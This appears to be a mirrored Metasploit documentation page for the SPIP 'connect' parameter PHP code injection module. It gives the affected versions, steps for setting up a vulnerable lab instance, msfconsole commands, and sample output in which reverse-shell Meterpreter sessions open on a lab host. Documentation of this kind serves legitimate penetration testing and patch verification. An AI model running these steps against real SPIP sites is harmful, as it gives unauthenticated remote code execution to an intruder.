ContextQMD
Back to Metasploit Framework

Spip Connect Exec

documentation/modules/exploit/multi/http/spip_connect_exec.md

6.4.1313.6 KB
Original Source

Vulnerable Application

This module exploits a PHP code injection vulnerability in SPIP. The vulnerability exists in the connect parameter, allowing an unauthenticated user to execute arbitrary commands with web user privileges. Branches 2.0, 2.1, and 3 are affected. Vulnerable versions are < 2.0.21, < 2.1.16, and < 3.0.3. This module is compatible with both Unix/Linux and Windows platforms, and has been successfully tested on SPIP 2.0.11 and SPIP 2.0.20 on Apache running on Ubuntu, Fedora, and Windows Server.

Setup

On Ubuntu 20.04, download a vulnerable instance of SPIP:

wget https://files.spip.net/spip/archives/SPIP-v2-0-0.zip

Unzip it to a specific folder:

mkdir spip-site 
cp SPIP-v2-0-0.zip spip-site/ 
cd spip-site/ 
unzip SPIP-v2-0-0.zip

Install PHP 5.6 and the necessary extensions:

  1. Add the PPA for PHP 5.6:
sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
  1. Install PHP 5.6 with SQLite extensions:
sudo apt-get install php5.6 php5.6-sqlite php5.6-sqlite3
  1. Enable the required extensions in the PHP configuration file:

Open the PHP INI file for CLI:

sudo nano /etc/php/5.6/cli/php.ini

Add or uncomment the following lines:

extension=sqlite3.so
extension=pdo_sqlite.so

Serve the application (while in the newly created spip-site directory):

php5.6 -S 127.0.0.1:8000

Navigate to the following URL, select sqlite for the database, and complete the installation:

http://127.0.0.1:8000/ecrire/

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/multi/http/spip_connect_exec
  3. Do: set RHOSTS [IP]
  4. Do: set LHOST [IP]
  5. Do: exploit

Options

No options

Targets

0 (PHP In-Memory)

This uses an in-memory PHP payload to execute code.

1 (Unix/Linux Command Shell)

This executes a Unix or Linux command.

2 (Windows Command Shell)

This executes a Windows command.

Scenarios

SPIP 2.0.0 - Linux target - PHP In-Memory

msf exploit(multi/http/spip_connect_exec) > run http://192.168.1.36:8000/

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 2.0.0
[+] The target appears to be vulnerable.
[*] 192.168.1.36:8000 - Attempting to exploit...
[*] Sending stage (39927 bytes) to 192.168.1.36
[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 192.168.1.36:47020) at 2024-08-22 19:19:00 +0200

meterpreter > sysinfo 
Computer    : linux
OS          : Linux linux 5.15.0-113-generic #123-Ubuntu SMP Mon Jun 10 08:16:17 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter >

SPIP 2.0.0 - Unix/Linux Command Shell

msf exploit(multi/http/spip_connect_exec) > run http://192.168.1.36:8000/

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 2.0.0
[+] The target appears to be vulnerable.
[*] 192.168.1.36:8000 - Attempting to exploit...
[*] Sending stage (3045380 bytes) to 192.168.1.36
[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.36:32794) at 2024-08-22 19:20:41 +0200

meterpreter > sysinfo 
Computer     : 192.168.1.36
OS           : LinuxMint 21.3 (Linux 5.15.0-113-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

SPIP 2.0.0 - Windows Command Shell

Somehow, I was unable to obtain a remote code execution (RCE) on my lab environment using the Windows Command Shell target. 
However, based on the exploit's design and its success on other platforms, it is expected to work. 
The issue might be specific to my lab setup.